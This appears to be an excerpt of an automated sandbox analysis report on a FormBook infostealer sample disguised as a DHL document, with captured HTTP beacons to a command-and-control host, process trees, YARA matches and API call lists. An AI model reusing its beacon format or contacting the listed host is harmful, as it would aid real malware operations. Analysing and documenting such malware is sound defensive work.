Dec 31, 2024 09:31:53.414555073 CET	776	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 76 39 30 2b 6a 75 71 78 72 4b 66 65 4a 78 78 35 45 69 47 4c 51 32 64 33 7a 48 6a 6f Data Ascii: BR14=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Jv90+juqxrKfeJxx5EiGLQ2d3zHjo
Dec 31, 2024 09:31:53.988262892 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Tue, 31 Dec 2024 08:31:53 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.9	49736	217.196.55.202	80

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:31:55.972460032 CET	800	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 64 51 30 67 71 41 64 71 62 39 2b 4b 48 66 33 44 58 43 6c 46 4f 33 44 75 31 54 4f 67 3d 3d Data Ascii: BR14=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhdQ0gqAdqb9+KHf3DXClFO3Du1TOg==
Dec 31, 2024 09:31:56.527298927 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Tue, 31 Dec 2024 08:31:56 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.9	49737	217.196.55.202	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:31:58.507144928 CET	1813	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 62 33 4e 6e 31 33 44 6c 54 76 7a 63 2f 49 66 64 6e 42 33 32 7a 57 54 57 4b 66 59 72 65 55 75 34 78 6b 73 63 72 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 36 4b 34 66 56 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 56 [TRUNCATED] Data Ascii: BR14=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJyfWb3Nn13DlTvzc/IfdnB32zWTWKfYreUu4xkscrKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO1OZn7hu6K4fV/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2ZwjLsRiXzLp0hW7XCxYtU4Yg0ZoSPICBxqpQZcANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu9hmqxppMzSSR7UA4dW16Bu2DKjbgT6L/DbRlNimMsB+P75MhcmW32kAWxFsSldlMU4Md+TC4NMlUjpW0fCWa6Mwjzo5tJP/M1s1aoCykvdpyc9w6HHFDY90zk4CKinoqhNy44lY9YeV+a1QgRhC7TNZ4+UT6gWg4ElKWajMWt4fapmEOWuUoijGRiATAadOxvdpDNhEfkG7wUSANZuZjofDpvNdpYNm91yAQsN38oC3wWnv0ry0w2VI2nIU13yNWffe2cuH1s0iooz1N5LaLtXlYO0opV/tgL3oosu/pAxCyl0CiHpMXlvDM7/5Rp97UJD3/edWJ+Zofwnn7DkaVH/Ao8jI+pYf5k1f5bbCRFINhXQuABSPo2xiHbf8T7XwPt5Zo7hklclqOhqVEz3v19j/P5JV1m4Qu5d+glEDjDrRrSUwOBUXhjeHGb3gUIqI3LfFqm6rbSi2cKLBIeUlmp3p8dBgY7iYLPO6r2JaK6eS0tN1KF733oTDKCD2h0HsmZGuVDyxZcLxrg9Lpc [TRUNCATED]
Dec 31, 2024 09:31:59.306493044 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Tue, 31 Dec 2024 08:31:59 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.9	49738	217.196.55.202	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:32:01.034749985 CET	504	OUT	GET /fo8o/?BR14=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&D0=YnO0xF1X40 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.empowermedeco.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 31, 2024 09:32:01.602961063 CET	1221	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Tue, 31 Dec 2024 08:32:01 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/?BR14=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&D0=YnO0xF1X40 platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Target ID:	0
Start time:	03:28:16
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\DHL 745-12302024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL 745-12302024.exe"
Imagebase:	0xa60000
File size:	1'569'792 bytes
MD5 hash:	8CC198852F8E33A75FE06DC4044794F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:28:17
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL 745-12302024.exe"
Imagebase:	0x290000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1591817678.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1591817678.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1592836487.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1592836487.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1591186605.0000000002600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1591186605.0000000002600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:28:25
Start date:	31/12/2024
Path:	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe"
Imagebase:	0x710000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3876602708.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3876602708.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	03:28:27
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0x8a0000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3875496509.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3875496509.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3875554643.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3875554643.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3875131699.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3875131699.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	03:28:42
Start date:	31/12/2024
Path:	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe"
Imagebase:	0x710000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3878718272.0000000005050000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3878718272.0000000005050000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	03:28:54
Start date:	31/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff73feb0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	1.1%
Signature Coverage:	3.4%
Total number of Nodes:	1581
Total number of Limit Nodes:	45

Executed Functions

Function 00A642DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00A6430D

Part of subcall function 00A66B57: _wcslen.LIBCMT ref: 00A66B6A

GetCurrentProcess.KERNEL32(?,00AFCB64,00000000,?,?), ref: 00A64422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00A64429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00A64454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A64466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00A64474
FreeLibrary.KERNEL32(00000000,?,?), ref: 00A6447B
GetSystemInfo.KERNEL32(?,?,?), ref: 00A644A0

Strings

GetNativeSystemInfo, xrefs: 00A64460
|O, xrefs: 00AA36F8
kernel32.dll, xrefs: 00A6444F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: ec0dd7e4b4983a3de6471d9d377a44ae2d25a2add3470354f17d60be71c546b0
Instruction ID: ac2d61619880775557ab0654de09a1d83ba8137f3f124a2d58e61f8f7594bcc1
Opcode Fuzzy Hash: ec0dd7e4b4983a3de6471d9d377a44ae2d25a2add3470354f17d60be71c546b0
Instruction Fuzzy Hash: 96A1737690A2C4FFCB11C7AD7D451AD7FBC6B2A740B389C99E08197B62DE304509CB29

Function 00A642A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00A650AA,?,?,00000000,00000000), ref: 00A642B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A650AA,?,?,00000000,00000000), ref: 00A642C9
LoadResource.KERNEL32(?,00000000,?,?,00A650AA,?,?,00000000,00000000,?,?,?,?,?,?,00A64F20), ref: 00AA35BE
SizeofResource.KERNEL32(?,00000000,?,?,00A650AA,?,?,00000000,00000000,?,?,?,?,?,?,00A64F20), ref: 00AA35D3
LockResource.KERNEL32(00A650AA,?,?,00A650AA,?,?,00000000,00000000,?,?,?,?,?,?,00A64F20,?), ref: 00AA35E6

Strings

SCRIPT, xrefs: 00A642BF

